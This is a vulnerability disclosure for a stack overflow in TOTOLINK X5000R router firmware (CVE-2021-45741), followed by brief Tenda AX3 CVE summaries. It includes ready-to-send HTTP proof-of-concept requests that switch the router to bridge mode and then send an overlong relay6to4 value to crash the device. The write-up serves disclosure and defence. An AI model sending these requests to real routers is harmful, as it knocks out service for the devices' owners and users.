In `rc` binary:

Eventually, the initial input will be extracted and cause the stack overflow.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_11/images/2.png)

As you can see here,The length of the input array(v24) is only 48 bytes and The length of the array(v25) is only 52, we can tamper with the content of the `relay6to4` field, such as a very long string.After that, it will cause the function return address to be overwritten.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_11/images/3.png)

But!It is not such a simple operation that can crash the router.The sequence of function calls that caused the vulnerability to be triggered:

`full_restart_ipv6`\->`full_restart_wan`\->`start_wan`\->`wan6_up`\->`sub_4385B4(vuln func)`

As you can see,There is a conditional judgment in the first step:need to set the router mode to bridge.

![](https://github.com/pjqwudi/my_vuln/raw/main/totolink/vuln_11/images/4.png)

**Therefore, the complete step to trigger the vulnerability is to first set the router mode to bridge by sending a data packet, and then send a malformed data packet(relay6to4 field).**

**Supplement**

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

**PoC**

We set the router mode to bridge, such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 329
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/opmode.html?time=1639968444503
Cookie: SESSION\_ID=2:1420070639:2

{"ssid":"TOTOLINK\_X5000R","key":"","channel":"0","band":"16","bw":"2","countryCode":"US","hssid":"0","wifiOff":"0","wpaMode":"1","ssid\_5g":"TOTOLINK\_X5000R\_5G","key\_5g":"","channel\_5g":"149","band\_5g":"17","bw\_5g":"3","countryCode\_5g":"US","hssid\_5g":"0","wifiOff\_5g":"0","wpaMode\_5g":"1","opmode":"br","topicurl":"setOpModeCfg"}

Then, we set `relay6to4` as **aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa....** , and the router will crash, such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 866
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/advance/ipv6.html?time=1639967398362
Cookie: SESSION\_ID=2:1420070429:2

{"dns1":"2001:4860:4860:0:0:0:0:8888","dns2":"","dns3":"","lanRadvFake":"1","lanDhcp":"1","relay6to4":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","sitMtu":"1280","sitTtl":"64","service":"6to4","topicurl":"setIpv6Cfg"}

**Result**

The target router crashes and cannot provide services correctly and persistently.

CVE-2021-45741: my_vuln/11.md at main · pjqwudi/my_vuln

Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function fromSetWifiGusetBasic. This vulnerability allows attackers to cause a Denial of Service (DoS) via the shareSpeed parameter.

CVE-2022-24151

Tenda AX3 v16.03.12.10_CN was discovered to contain a stack overflow in the function fromSetWirelessRepeat. This vulnerability allows attackers to cause a Denial of Service (DoS) via the wpapsk_crypto parameter.

Tag

#dos